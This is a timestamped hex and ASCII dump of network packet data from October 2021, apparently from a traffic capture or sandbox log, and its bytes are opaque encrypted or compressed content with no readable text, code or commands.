                                                                                                                                                                                2021-10-19 05:23:31 UTC38INData Raw: 35 bb f3 87 c3 45 72 7a ec 31 dc 7e ed b6 1b ce f6 ee d9 c1 4a 32 50 4d bb 57 61 83 93 c9 e0 f0 88 a5 14 bd 1a 15 b4 c5 e5 ba 62 14 e8 48 1b ba 81 5e 66 37 2a 6c b8 ba 51 77 ae bd f2 83 a6 6d a7 e1 6b b4 9e 76 7f f1 d2 cf 15 a6 7c d4 65 34 9b 6a 76 63 08 28 8c 21 20 6c d1 69 cc 8d 4b 19 77 ac b7 72 2b 16 94 02 16 af 7d 49 c1 a3 ab 07 7a dd 04 d8 fa 9d 03 28 ca 10 39 f8 fe cf 60 88 19 21 c8 fa e2 c0 80 3d ad 70 95 b2 26 bd 9a 21 e3 a4 74 56 71 15 a6 ef 58 ac de 81 83 24 51 29 1a 20 56 23 dd 9a a6 05 e0 be 70 c7 38 20 47 97 cc 55 ad 90 e5 e3 0e a3 c1 e8 a6 50 41 4d 0d 41 54 4e 67 8b 0c e1 05 81 a6 a4 1a ad 8f 0b f7 31 c3 a6 2a 2c 74 69 19 91 59 22 f2 68 de af 36 c9 aa d1 4c 54 33 6e 7a eb 86 b7 20 97 4c e4 94 24 58 51 27 46 06 48 bf 2c ef 99 a3 51 6d 9e 5a
                                                                                                                                                                                Data Ascii: 5Erz1~J2PMWabH^f7*lQwmkv|e4jvc(! liKwr+}Iz(9`!=p&!tVqX$Q) V#p8 GUPAMATNg1*,tiY"h6LT3nz L$XQ'FH,QmZ
                                                                                                                                                                                2021-10-19 05:23:31 UTC39INData Raw: d4 22 04 7f bc 66 60 ff 62 7f b6 8f 2a 6d 52 25 d6 80 d8 3e a4 18 63 45 be 42 90 cb 10 d8 9c 4b 52 6d e7 29 d0 81 33 df 63 c8 2f ae 12 ca 68 77 6f 5d 5c 54 23 14 f4 ea 63 2e 74 57 a4 9e 6b 07 ca 6d d7 94 91 97 44 8b ff 66 34 7a c8 d3 16 a8 11 44 cb 2f 8f 6c 4c e4 43 7d df 5b 56 98 84 f0 f0 1f d6 40 0a 79 d8 b2 6a 06 2b 02 23 24 a3 fc 5f e6 8a e7 45 64 37 15 dc 55 74 f5 08 e3 07 4b e4 e2 22 cb 6f d5 75 2b 34 b0 78 91 24 4d 84 05 66 7d de 49 39 7a 21 9a 6f 6d 77 9d bc 60 1d 59 71 2e 1f 2a 9f 43 dd 05 d8 ee 42 5f 22 6a 5b 63 d9 40 8d b7 d7 20 8f fb b8 f3 56 76 e1 bd 35 b7 5b 4b ac 7f a4 16 0e 2d 39 99 05 26 89 20 a9 b4 11 03 f8 38 bd a6 16 4a 2d 2b 3e ec d6 8d 16 b4 cb 54 d1 75 29 15 5c 8e ad 86 b2 51 38 76 67 3e 34 ce 52 98 11 3c 1f 2b 42 43 aa 52 3a 43 d7
                                                                                                                                                                                Data Ascii: "f`b*mR%>cEBKRm)3c/hwo]\T#c.tWkmDf4zD/lLC}[V@yj+#$_Ed7UtK"ou+4x$Mf}I9z!omw`Yq.*CB_"j[c@ Vv5[K-9& 8J-+>Tu)\Q8vg>4R<+BCR:C
                                                                                                                                                                                2021-10-19 05:23:31 UTC40INData Raw: a6 5f 3d 10 9d 4b b3 70 75 5e f1 be e5 19 d2 a1 19 0d 7f 2d 7e 60 6c 18 51 22 f5 67 94 54 6d 94 85 5a 71 f6 59 a3 85 6c 84 82 70 3c 95 dc 38 a5 35 cf 67 af 1c f8 68 f1 05 44 fc 85 87 97 45 d9 65 32 6a 48 88 08 cd af 51 8c 1d 21 96 81 a3 47 88 13 56 23 7b 49 c9 fa f3 9d d4 1d 34 92 64 7b 32 4e cc 3a 6a fb 72 9b a5 8e 77 2f 92 59 76 71 3f c6 e6 f2 27 1d 4b 7f e0 43 77 8b 59 6d d9 23 9a cc f0 c6 c0 3f e2 82 6b 60 87 1b a8 0f 65 a1 59 13 9a 90 ee a7 86 f0 b1 22 1c 45 aa 3f 02 12 24 b7 87 ea 5f 30 4b 07 d3 37 ae ff a1 58 0e 3d d0 95 6a e9 0d 59 63 4a fe ce 68 97 47 bd 7d d8 9a 31 66 a6 cd 48 09 0e eb 1f 67 6f 21 c0 e7 5e 70 69 ab 78 6e 80 ec 36 7e ea aa b0 24 10 f2 60 00 b3 98 f9 c7 94 a5 3b 05 43 6f 79 ce 8a 9a 0f fc e3 3f aa 6e 59 67 22 37 47 89 b1 b9 ea 65
                                                                                                                                                                                Data Ascii: _=Kpu^-~`lQ"gTmZqYlp<85ghDEe2jHQ!GV#{I4d{2N:jrw/Yvq?'KCwYm#?k`eY"E?$_0K7X=jYcJhG}1fHgo!^pixn6~$`;Coy?nYg"7Ge
                                                                                                                                                                                2021-10-19 05:23:31 UTC42INData Raw: 15 e7 01 6a 08 01 21 39 38 14 69 4f f5 d6 65 f9 f1 36 a3 e4 e9 74 af d4 dc 18 5d b9 70 17 44 f0 81 48 ed 83 f5 d5 ac 26 06 1d 7a a8 cb 2d f4 85 99 d1 a3 1b 04 67 b2 cc d0 48 cf 72 3c 5c 1a 8f 92 0d 14 f9 7e 52 3b 40 00 b3 81 ce 0e a5 01 00 c4 81 b0 ed 4c a4 5a 36 af fe 0c a1 f4 e4 f7 57 73 ac 8c 44 04 b2 3f 38 9f bc 10 79 4b 17 65 ed dc 23 76 54 85 d4 d9 28 f4 ab 70 f7 9d 1d 54 a8 1b 86 1e 59 01 7b c4 38 85 c4 49 f0 43 fb 6e 0e 57 67 61 e6 a3 e3 c2 94 a8 8a fb 07 9f 1c eb 32 67 d9 6b 19 94 64 f5 32 ce df 30 82 cf 09 10 72 7c 8c 21 7c 78 83 f5 c6 75 d9 d5 f2 87 28 f5 8e 02 80 4a ba 36 8f 16 c3 d9 98 d6 7a 46 27 cd 33 99 a2 4f 59 21 c8 3e b2 ce 1f 3b 9f cd 4a 21 b1 fe 00 12 ca 96 74 be 50 db b7 7c 84 fe e3 6c c3 b4 2b 04 a9 42 ee ff e4 10 76 51 af 90 df 30
                                                                                                                                                                                Data Ascii: j!98iOe6t]pDH&z-gHr<\~R;@LZ6WsD?8yKe#vT(pTY{8ICnWga2gkd20r|!|xu(J6zF'3OY!>;J!tP|l+BvQ0
                                                                                                                                                                                2021-10-19 05:23:31 UTC43INData Raw: 91 ac cf 03 59 8a 65 02 9b 6d d0 84 6b cc e6 7c 42 6f f8 bd 74 24 65 99 c5 4b 59 88 9b cb 92 75 77 5f 2e a0 28 a0 ac 37 4b 34 81 c8 30 82 02 d4 3d 7c a8 42 5a f5 44 98 fc 6d 48 1c ec d1 49 f7 50 61 46 d5 8b 52 ed 0b d3 55 d2 48 0f 0c bb 32 06 f8 00 e9 2f d6 5b 78 bc bf a6 b2 d8 4f e7 25 24 f6 7a 2c 6d 6f 3d 42 e7 6f 69 b4 cd ef 35 2b 59 1b ab b2 7c d9 80 0d 71 16 d7 85 d7 85 65 1e 5c cc 7a e5 2a 0b 88 c0 40 11 eb f3 9d a8 75 c1 6f c5 28 43 d0 6a 1f b8 85 7f c1 2c 60 eb f2 dd e2 16 77 22 62 0a 07 12 88 e0 7c a7 19 8e 6c 3a d9 31 9d 72 b6 e9 92 97 89 1c fe 09 93 53 f3 d7 4b 6a 2f 04 0f 12 1f e4 47 a0 ea ad e8 b6 1f 27 8a 10 08 f1 57 37 63 d9 c4 ba 98 eb d8 e6 28 4c e3 d6 57 ec d7 66 50 d5 57 b1 62 15 77 a7 50 bf 58 a4 0f fa 0f 44 40 de b0 24 e8 b3 63 9b f3
                                                                                                                                                                                Data Ascii: Yemk|Bot$eKYuw_.(7K40=|BZDmHIPaFRUH2/[xO%$z,mo=Boi5+Y|qe\z*@uo(Cj,`w"b|l:1rSKj/G'W7c(LWfPWbwPXD@$c
                                                                                                                                                                                2021-10-19 05:23:31 UTC44INData Raw: 9f b9 ac d0 2f 2f 14 c7 bb a3 ac 4e 0f fc 23 eb 1e fb f1 f8 91 66 1d 3d eb 95 f7 e7 8b 85 56 98 5c 36 64 84 de b0 17 f7 fa 22 5e 69 a8 c4 f7 df 1f 65 32 52 f6 15 da 64 84 96 08 89 c7 37 5f ce ba b3 db 26 cb fc 97 16 2f 34 83 87 96 7b 5e dd f5 f9 d4 4f c1 1b f8 4c 77 d4 58 2c a6 61 59 48 23 4d e2 89 cb 7b 7c 79 83 70 f5 cd 57 e5 0e 10 68 45 3d 5e 24 66 29 dc 1d 5f 3e fc 11 c0 4d 87 3f 29 02 07 1d e7 0d 6a 0c 84 f4 7b b3 0a 5c e5 fc 65 d3 32 3d 9a 2d e4 a6 80 23 c4 b4 12 0d 97 f9 64 2c f1 a6 3c 6d 32 34 26 38 df e1 d8 0b 19 30 ca a2 15 c9 5d 61 55 86 f9 8a 49 fd 64 52 6d 66 a4 f0 84 0b 54 2e fc 3f 20 de 2e 9a 12 a0 84 0d 80 5e f8 f1 3d 4c 76 75 6c bc d9 68 fc d4 d4 52 e9 d3 c4 66 55 de 4c 39 5f 2e 7d d1 d6 01 86 92 24 81 2a 03 24 5f a2 e2 62 d6 fc 50 d9 41
                                                                                                                                                                                Data Ascii: //N#f=V\6d"^ie2Rd7_&/4{^OLwX,aYH#M{|ypWhE=^$f)_>M?)j{\e2=-#d,<m24&80]aUIdRmfT.? .^=LvulhRfUL9_.}$*$_bPA
                                                                                                                                                                                2021-10-19 05:23:31 UTC45INData Raw: 24 8f a7 e8 29 93 fa a9 79 31 be 1d ec 8c cb 56 66 24 54 8e b4 c3 20 9a 88 19 7a 7c b3 6b 86 02 b1 a2 75 37 67 4c 86 28 55 67 26 83 5e c4 66 f6 19 5f b0 7d 2e 2f 0f e1 bc 7d d7 84 9a c6 c5 fa 55 2d ea de f2 fd 49 b7 48 ab 6d 4e 63 87 51 bf 22 70 a7 10 4d 5c 0a 9b e3 17 b9 6c 66 0c b5 92 06 96 be cb fa d1 1f c2 44 db b0 62 e5 a4 93 16 26 ed ff 9e 4a 00 1d d1 8e db b3 af 17 3c 6c 31 1b 83 d9 95 95 40 78 c9 42 e2 f6 4c a8 0e 3c 3f 6b 47 c3 87 ac 2b 55 42 4d d6 aa 00 2c ee 9b 2e 1e 49 b2 94 91 68 38 16 6c 22 6f 58 90 77 c2 c2 fa 48 d5 63 43 bc 6f 05 c7 7a 49 9a 7a 2f 84 01 9a 99 c0 b7 40 55 f9 23 74 32 e1 85 2b 6d fd 39 79 7e 6b 21 ac 20 45 2b 0e 7c ea 9e d3 20 cd 50 b3 a9 96 a6 55 2c 2e 37 f1 21 7d 90 70 e7 88 56 0f f5 27 a9 ca c0 24 40 a4 cd 2b 12 46 5a 89
                                                                                                                                                                                Data Ascii: $)y1Vf$T z|ku7gL(Ug&^f_}./}U-IHmNcQ"pM\lfDb&J<l1@xBL<?kG+UBM,.Ih8l"oXwHcCozIz/@U#t2+m9y~k! E+| PU,.7!}pV'$@+FZ
                                                                                                                                                                                2021-10-19 05:23:31 UTC47INData Raw: bf 2b f0 67 0a b3 67 82 e8 1c 7a 28 7f df ef e7 3b 19 ba 5c 13 f2 24 94 2d f6 4a 33 59 75 16 a0 67 a2 91 60 15 28 7f 27 4d 0c f2 f4 11 ba b8 86 f2 d2 97 c6 fb aa 82 04 26 ba 9b 02 a5 e8 93 8d 22 24 0a 96 59 46 c9 a8 81 dc 6c d9 25 42 e3 80 76 22 25 28 f9 6d 22 81 3c ab 45 26 bb 0d 11 51 b4 93 77 30 8d 22 bc f2 30 d1 64 fc 81 33 3c 98 40 2b 5a f0 22 f3 9b b4 d2 1a 3a 7b 10 28 9f c7 af 33 14 62 f7 89 61 ba e8 41 1a 76 84 f3 df a6 80 35 cf ff 75 e7 92 85 9f 3b 28 8a d1 1f f0 56 0c 31 a8 ea 2b f9 7e 39 b3 87 6c 70 f6 b2 4a fb 6d b0 c1 82 c2 21 6f ad 2d 06 ae f0 bf 12 11 24 2f 77 8a 99 93 dc 83 06 fe 9a fd de 5e 41 8d fa 03 e8 e1 52 5c 51 67 3a a6 8c 79 54 91 17 e4 29 7d 4c e2 67 2a e0 50 94 60 6c fd d9 45 2d 77 7d 85 08 b5 3a 8b f0 b5 60 27 2a f0 9d 6d 8b 0f
                                                                                                                                                                                Data Ascii: +ggz(;\$-J3Yug`('M&"$YFl%Bv"%(m"<E&Qw0"0d3<@+Z":{(3baAv5u;(V1+~9lpJm!o-$/w^AR\Qg:yT)}Lg*P`lE-w}:`'*m
                                                                                                                                                                                2021-10-19 05:23:31 UTC48INData Raw: ca c9 03 6e 1e ab 32 6b 20 bd 86 28 16 ef 6b 57 5e 8e 68 a5 4c 14 ef 74 39 01 22 ae 00 c2 fd 58 c5 c0 38 a9 a5 79 71 83 a6 26 6f 87 65 c7 bb 0d a0 c0 1f 5f 86 66 2f 39 27 40 8d a6 b5 3a 84 00 ea 18 b1 91 bb d7 ff ea 25 d8 11 00 9a 4a a8 28 52 a9 6b 45 4c 78 5a 4d 2a 67 7b 56 2a 69 6f 32 35 0c 4d fe d7 81 3b e1 a5 bd 6a 19 ea 07 ff 2d e4 92 e4 47 67 1d d5 9d 0d 41 6e 41 4e 39 98 1d 1c 2b e0 2f 30 76 2a 46 3d cf 04 d6 1a 39 cf 23 04 0a fe 81 24 a6 83 11 26 c1 66 ac 86 64 0e 83 56 23 e8 4c cc 41 65 17 43 ef 7b 16 1a 5d 4e 46 d1 4c 96 74 3a 4b d8 7e 97 df a5 1a 0a db d1 57 56 9e 05 7e 80 9c 65 74 90 37 4c df 99 01 93 94 3c 75 75 c0 11 18 6c ed 35 01 74 70 9a 3b a4 8c 76 6e 6a 59 53 4b 34 f2 a4 6f 80 b7 cf d7 7a 26 cf 09 d4 30 71 31 89 62 11 ce 29 52 47 2c 95
                                                                                                                                                                                Data Ascii: n2k (kW^hLt9"X8yq&oe_f/9'@:%J(RkELxZM*g{V*io25M;j-GgAnAN9+/0v*F=9#$&fdV#LAeC{]NFLt:K~WV~et7L<uul5tp;vnjYSK4oz&0q1b)RG,
                                                                                                                                                                                2021-10-19 05:23:31 UTC49INData Raw: 61 d4 22 ee 14 2a e7 d8 9a 48 ba 7d e4 6b cc ea 99 f4 e9 e0 9e 72 29 2c 31 57 84 a4 66 54 e6 c5 5e a1 1f da 5d 86 2c 1f a3 6f ce 86 18 6b d4 1a a8 d4 01 1e 5d 05 c0 8b 3e 0a b3 89 b1 5f f7 50 13 09 9b a3 cc dd c0 11 09 22 0d a8 9d 1d b4 73 db 8e 25 30 69 ff b4 56 fb 2b 73 ca 00 7d 4e ee 2d 5f cb ea 89 16 2a f3 0c c2 3a e3 3c 4d 39 c7 ec 65 57 6a 31 0e 30 31 1c 1a 6b 3e f7 75 78 67 24 11 7b 74 06 9a 34 d3 ed 43 ea b5 73 5f 96 a2 0c 34 51 0d f8 95 a5 5f 66 a2 28 e1 3c 96 84 e6 92 6e 43 67 48 3d 11 4d 6f 07 2c e4 2c de 5f 72 a7 93 8c 33 5b 80 2a 60 9f f8 9c 48 29 44 03 ab 63 20 91 e5 e9 f6 cd 84 44 20 32 3d 32 04 91 71 a3 41 c2 63 b9 96 40 7a b1 64 47 33 55 e4 28 ff ac 34 6a 66 4b fa 55 30 38 19 66 75 9b 06 c1 69 5f 62 0e 4a 12 f1 0d e3 cb 53 f5 aa 1f 51 94
                                                                                                                                                                                Data Ascii: a"*H}kr),1WfT^],ok]>_P"s%0iV+s}N-_*:<M9eWj101k>uxg${t4Cs_4Q_f(<nCgH=Mo,,_r3[*`H)Dc D 2=2qAc@zdG3U(4jfKU08fui_bJSQ
                                                                                                                                                                                2021-10-19 05:23:31 UTC51INData Raw: 6d 49 6d 5e 7a 51 80 f8 8d 04 57 19 22 93 78 04 af 05 87 68 25 67 a1 8a db 5b f2 0b a2 a1 5f c2 9a 40 cc 34 62 9f 1f ea a1 50 d1 04 26 bb 7b f7 85 7d 57 95 a2 58 35 3c c1 04 d7 76 65 17 5e ac 59 50 7d dd 75 66 8c 54 26 28 ad 31 17 10 4d 64 3c 9a 77 19 75 8e 1c 11 b0 80 55 5b 77 32 42 13 f9 b0 fc 51 4c ac 4f 1e 96 23 e7 04 6d 41 98 74 44 ba e6 04 40 7c f6 a9 86 81 8f 2c 54 80 1b 1d 7b 88 f6 81 bd 2c b2 6a 66 9f 29 88 82 87 0a 51 90 21 52 c4 7c 6c 86 fa c0 d0 5b eb 65 da b2 21 f8 8f 7d 45 d5 29 56 67 86 b4 ea 9d 07 6d 01 26 81 1e 58 5a 0f ea 93 2f 3d 38 f7 0b 78 d1 d4 5c b3 10 46 77 9f 17 28 8b 9d 46 76 b1 60 8c 74 0f f4 07 d8 2c 2e 34 29 9c 4f 45 66 07 dc e9 f7 95 7b d1 0e 96 26 25 25 59 bf 1c 20 ba d2 5a 1c df 70 2a 5d d8 33 20 06 4b 79 ea bd 57 dc 31 b2
                                                                                                                                                                                Data Ascii: mIm^zQW"xh%g[_@4bP&{}WX5<ve^YP}ufT&(1Md<wuU[w2BQLO#mAtD@|,T{,jf)Q!R|l[e!}E)Vgm&XZ/=8x\Fw(Fv`t,.4)OEf{&%%Y Zp*]3 KyW1
                                                                                                                                                                                2021-10-19 05:23:31 UTC52INData Raw: be b4 2e d8 63 3e 85 df f3 6a 60 d4 87 17 2e 58 fb 73 6b 7e 7c db 40 70 36 ad 18 ed 30 5a 59 e2 36 86 66 fa 03 a1 3e 7d 15 2a 16 8c b1 db dd 41 83 7e b1 93 d2 0a d7 3b 41 8c 38 1c 42 53 71 56 8b 80 f7 6a c2 76 8c 79 83 7c 0f e0 d0 28 7d d7 b5 ff 2d bf ed 27 37 84 ee 3e a2 05 a3 e2 15 82 7a 63 b0 92 05 3a bb 7b d4 19 6e d1 42 eb c4 25 ce 8e 69 18 ec 1f fb 60 94 b3 1d e5 40 84 2f 6c 9e 39 4f cf d4 fe 6e 54 72 c5 56 05 f8 a4 1e fc 8a 30 3d 65 2b b0 2d d7 f0 02 12 cb 21 8b b3 80 25 41 da b1 58 fa 5c 30 77 61 4e cf 58 e4 24 9e 4f a5 e8 58 db f9 e5 37 0c 41 1a 4d f3 08 bd 50 97 90 7e b8 7b 65 a2 91 03 93 07 ff 72 6c 69 20 d5 98 5a 5a 11 42 89 d5 6e 90 0e 9a f5 d9 e6 fb aa 5e fa 37 fe 29 0f e6 b2 83 0c 41 e5 0a dc af c6 6b 70 c5 b0 a6 0a f5 95 67 5c 6f 7e 15 19
                                                                                                                                                                                Data Ascii: .c>j`.Xsk~|@p60ZY6f>}*A~;A8BSqVjvy|(}-'7>zc:{nB%i`@/l9OnTrV0=e+-!%AX\0waNX$OX7AMP~{erli ZZBn^7)Akpg\o~
                                                                                                                                                                                2021-10-19 05:23:31 UTC53INData Raw: 5a 0b 27 3e 23 1d 90 36 02 5e 0c a7 17 7a 65 bc 1e 6d eb 26 a4 fc 3d 82 62 09 f9 da d0 a1 27 45 c6 07 28 7d e3 0f 4d a0 36 95 e5 5f 56 a3 7e 92 ec 25 fd 66 cd 93 b9 a5 20 5f 46 6f 5b ae 36 bb 6d ae e6 2e 60 65 e0 5c 7a 90 ec 6e b5 9f 2f b7 88 ca c4 66 62 63 73 1b 8a a5 86 27 55 20 dd 2e 58 9d 1c 46 26 ed c0 4e 8f 0b 7c f8 82 c4 aa 53 07 1c cd 2b 7c a7 ec 99 89 35 d9 2e 13 1f 09 2a c4 c8 ca 5b 0b f9 65 5b 5b 66 35 bd e3 e8 56 33 81 86 50 81 5e 65 ae f3 1f db d5 46 57 07 d5 bd e0 06 27 c3 9e 79 50 d5 68 8b 72 f8 b5 87 09 99 bd d5 7a 42 04 88 b4 c2 54 5f 81 01 1c 1d 14 21 4c ed d2 93 bf fc 8a 41 a8 91 79 f3 b4 a7 98 75 c0 bc c5 b4 65 10 99 fa 29 23 5c a2 02 a1 74 29 d9 ee bf 4c 77 55 d8 25 ef 52 fd 8b cc 19 f7 8f 8b 76 ec fc 2c 6f 28 61 ab 1e 2a 7c 77 8f 2b
                                                                                                                                                                                Data Ascii: Z'>#6^zem&=b'E(}M6_V~%f _Fo[6m.`e\zn/fbcs'U .XF&N|S+|5.*[e[[f5V3P^eFW'yPhrzBT_!LAyue)#\t)LwU%Rv,o(a*|w+
                                                                                                                                                                                2021-10-19 05:23:31 UTC58INData Raw: d5 2e 42 46 cd 56 bd ff 03 f3 40 0d 00 b7 0d e2 6f 51 0f fc fb e6 a7 0d 15 27 b1 62 6e c0 2e 2f ec 19 d2 dd fb 02 2c 0f 4d d4 74 ff 9c 4c 1a 8a 57 18 6e 45 0f c6 9e 24 4b 4e 49 f9 78 1d 59 67 11 9a 8d 40 a1 27 49 a2 33 94 06 67 b7 7d 94 cf 09 a2 64 25 ef c3 31 f1 f8 07 10 3f 60 ed 05 5d 0b eb 10 e8 ef 57 05 ea 72 a6 db fb 09 83 00 3c b5 5b 56 8d 01 37 03 3b 1d a0 d8 18 90 3b b6 5e ed e6 be 22 31 5b 2d 33 f8 cf a8 0f 7a 6e 99 dd bc 7b 34 d5 40 27 29 f4 b1 5d 38 94 e1 88 2d 82 75 77 bb 71 bc 2f e5 97 24 6f b8 24 8d 1c bd 73 2f 87 76 34 49 f1 d3 3f 42 99 d8 a5 23 96 7f d8 86 99 84 04 18 8c 68 e4 40 f1 72 28 42 37 43 5f 38 98 fb 3d 07 3b 27 b6 bc 96 2d 98 dd a4 79 8d 57 a0 31 82 19 e0 eb 8e a3 4a cf bf 2e 32 8f c6 71 d1 3d 90 38 41 1f 47 08 a5 44 d0 61 7b b5
                                                                                                                                                                                Data Ascii: .BFV@oQ'bn./,MtLWnE$KNIxYg@'I3g}d%1?`]Wr<[V7;;^"1[-3zn{4@')]8-uwq/$o$s/v4I?B#h@r(B7C_8=;'-yW1J.2q=8AGDa{
                                                                                                                                                                                2021-10-19 05:23:31 UTC62INData Raw: 5d 67 25 55 85 95 62 10 0e cd d2 00 ee 5d bc 13 70 0c 6f 60 af ed 40 2d b1 dc 2b 10 6d 39 b3 a7 59 8c 5d 93 69 22 c8 e3 43 89 fa 86 ff 4c 99 8a f2 2c 58 10 6f 39 13 6f 04 62 da 2a e3 d8 4c 4f 62 61 29 21 73 29 8e 1b ef db 3b 0b d4 99 16 2a a0 29 4a f2 d1 04 f9 22 9b ad 1b 34 f3 7a fe 8f 5e 5a 80 69 c3 29 05 1c 70 3e d9 bd b9 9f 0b 27 a0 89 aa 1f 50 2e 28 0d 00 96 f7 10 79 03 f2 b9 73 f9 c9 3b 6d 3e 77 ed 72 97 6c 98 d4 fb 86 6e 73 63 bb ff d3 99 63 37 51 82 b3 1e 0e 2a 8a f1 de 21 93 a6 19 aa 5a 23 d0 ab 1b a4 7a 69 5e 22 7f 2a 18 26 6b 5c 70 c8 88 9c 77 2b 66 51 86 a4 20 f3 6c 2c 3e 59 5d 25 84 ab b7 18 6a 1d 57 21 64 88 b6 45 d5 66 a7 c4 ab bc 6a 13 ab 4c e0 b0 6d b8 af ec 7e 6e 1c 65 39 ae 68 4d 89 f4 e4 4b 6f 32 b1 97 cf db 01 b5 15 36 d3 5a eb e5 54
                                                                                                                                                                                Data Ascii: ]g%Ub]po`@-+m9Y]i"CL,Xo9ob*LOba)!s);*)J"4z^Zi)p>'P.(ys;m>wrlnscc7Q*!Z#zi^"*&k\pw+fQ l,>Y]%jW!dEfjLm~ne9hMKo26ZT
                                                                                                                                                                                2021-10-19 05:23:31 UTC66INData Raw: 2a e2 11 b6 d6 99 ff ca c7 3b 5d 36 2e a6 4b 2f a7 29 2f 68 d2 5c 0c 83 6a 24 c9 2e 92 7a d1 3c 8d 15 9e 8a fc 5a bc 06 d3 6f 3c 69 30 30 b2 1b e2 70 6d e4 b6 59 86 f8 99 e0 71 6c a6 d6 8c a8 58 86 92 e6 45 09 c5 b6 98 7a 59 c2 11 f2 2a f0 21 8e 5e 5d 7a d2 86 4c aa 30 85 8c a1 12 90 20 30 99 9f e6 81 5f 32 ec f1 b1 d0 fe d6 ea b9 1d 9c e9 49 a1 02 76 e6 37 e7 87 25 91 65 8b e5 c4 06 a6 61 d9 a6 9a 7b b9 5b 67 7b ab d5 d2 71 a2 5b 5d 31 c8 d0 45 16 d2 39 b8 db 11 fe bc c7 a6 b1 e8 a7 6d 2f 37 62 a0 14 4b 4c c0 5f 74 c0 52 28 f0 0a 71 7d 25 0e fb 2c de aa c9 f0 41 d0 d1 f3 9f 27 57 d1 9d ef 69 91 98 e6 88 36 5c e1 da be 1c 5e 11 a0 e6 cd ed 40 2a 7c b8 c3 b9 4c be 02 44 a7 06 ac d8 0e 8a 4e 2d ae b8 51 b3 c4 4e 19 e4 7a 7a 76 e9 cf e4 34 bc 28 03 74 4a 65
                                                                                                                                                                                Data Ascii: *;]6.K/)/h\j$.z<Zo<i00pmYqlXEzY*!^]zL0 0_2Iv7%ea{[g{q[]1E9m/7bKL_tR(q}%,A'Wi6\^@*|LDN-QNzzv4(tJe
                                                                                                                                                                                2021-10-19 05:23:31 UTC70INData Raw: c4 d1 d0 d8 79 19 64 9f bb 20 08 0e b0 21 95 e3 8e d1 4f d3 6a a6 19 81 8f 46 68 f0 b0 66 bb 12 f5 40 1c 03 10 d7 d2 3d 0c fc d1 92 47 1d c1 f5 7d 8f 5a 40 74 83 a4 f3 83 90 d5 31 07 48 6d 43 8f 8e 81 91 42 69 70 fa 3b 75 0d 6e ec 3c 00 82 82 a4 2b 2c 46 80 d2 e1 2a 34 04 a2 a2 b8 3c 43 22 18 86 67 d4 ea c7 2f 7f 48 90 5e a3 bc 57 f5 5b 72 9f 03 d1 da 3a dd 12 21 6a 5a 57 87 10 c2 c8 d3 f1 ad 0f ce c8 05 ad a8 e7 a3 c1 5e 57 17 d7 5b 69 5e 88 fb 7a c7 30 4c 5f 24 f4 4f 9a 81 12 72 44 fa d9 86 a7 f4 1d 3c da 2a b1 17 76 aa 8b 1e de 83 c8 d9 50 3b 69 bc 6d 4e ae ce 91 fc 54 be d7 9d bc c9 4a 7a 06 7f 52 1e c5 a5 b6 82 64 7d de 23 6d b7 3c 64 5f 00 7d 82 31 13 b5 41 2a 1e 63 5f 4d f0 80 5d 5f 0b 38 59 88 4a dd 8c 58 2c dd 5b c7 2b 33 d6 94 cf f1 2b 07 61 d5
                                                                                                                                                                                Data Ascii: yd !OjFhf@=G}Z@t1HmCBip;un<+,F*4<C"g/H^W[r:!jZW^W[i^z0L_$OrD<*vP;imNTJzRd}#m<d_}1A*c_M]_8YJX,[+3+a
                                                                                                                                                                                2021-10-19 05:23:31 UTC74INData Raw: ea e6 2e 60 cb e4 1a 00 1e 27 51 8c ab 77 17 ac 6b 2d 68 60 0f 70 a0 b1 50 a5 cb be 7f ea 2f 81 2a 5f 74 eb 10 9c 1a 75 21 0f 52 35 38 2e 51 7c 23 f4 bf 3c 7f eb 83 81 01 5d fd 8a ec 80 fa 29 d4 a5 d7 91 d9 7e e9 25 79 a5 27 59 d4 6e 5b b2 24 1c 4d fc 22 8a 8c 50 91 6f 67 9e a1 98 27 cf 17 1e 14 9f 02 87 16 7b 24 28 5a 27 82 77 d8 52 72 5a 5a b4 c5 73 59 55 5f 62 c0 f9 50 d4 a1 c9 f0 20 4e e0 31 7d 51 30 aa bd 5f 85 06 60 72 eb f0 87 d8 bf ac 27 44 88 14 a6 8f 2b 1a f8 f8 30 b0 1a 23 fd 2f fa e3 f2 0c 01 34 f6 89 7b 30 30 2b b5 57 2c 10 75 68 bc b0 1f da 91 a2 d0 74 52 e8 14 26 6c c5 80 46 6d 53 5b 43 5f 04 6b 33 24 df c4 14 f7 24 86 d7 b9 3b e9 08 63 24 85 5b 7f 56 a2 d9 e5 dd 71 b0 9c 19 de 42 2c 30 7d 7d db 22 98 02 4b 4f 37 2b 58 24 04 b9 6b 0e 68 b1
                                                                                                                                                                                Data Ascii: .`'Qwk-h`pP/*_tu!R58.Q|#<])~%y'Yn[$M"Pog'{$(Z'wRrZZsYU_bP N1}Q0_`r'D+0#/4{00+W,uhtR&lFmS[C_k3$$;c$[VqB,0}}"KO7+X$kh
                                                                                                                                                                                2021-10-19 05:23:31 UTC76INData Raw: 06 c2 91 a4 fc 66 1d ab a9 7a 54 89 5e 0b 57 fb 6b 62 5a 8b 80 75 b4 20 64 61 d2 76 04 00 43 d5 de b2 2e 66 77 3c c0 d9 bc ce f2 9f e4 5b 44 dd f1 4b 91 66 46 45 7d 04 22 a4 79 77 c9 20 fd a1 d6 4d 22 4c 39 7b 36 b5 50 f7 41 94 c0 0f 48 1c 66 41 c6 85 34 4a 2a eb bb 11 fd 2b 82 63 2b 6c 9c 2f 9e 9f d2 96 b0 15 12 16 31 80 b3 b6 8c b7 71 71 5f 75 08 da 57 62 11 e6 2d 84 d5 ab fc 08 2f a3 84 5f b2 ea c6 11 57 e1 6a 07 6a 35 5c 59 60 60 21 28 c9 d9 41 6d ee 0a c1 1f 2b f0 75 4f 05 4e 41 6b 12 0f c4 ab bd c6 03 08 8a f0 2d 23 37 a8 39 74 86 92 56 93 f7 65 d1 5b 3d 2c 4c 7e b7 f0 40 8d 9e 1c 1e e9 2b e6 dd 6c 2c 84 41 ac 09 d6 19 bb 38 33 75 af 0a a0 b1 5f 5e b5 20 01 5f f5 f5 4f a8 81 5f 83 84 3c 96 0b 23 51 8e 20 a0 1b ee 5e e0 a6 02 26 be 7b 77 df 59 5d 28
                                                                                                                                                                                Data Ascii: fzT^WkbZu davC.fw<[DKfFE}"yw M"L9{6PAHfA4J*+c+l/1qq_uWb-/_Wjj5\Y``!(Am+uONAk-#79tVe[=,L~@+l,A83u_^ _O_<#Q ^&{wY](
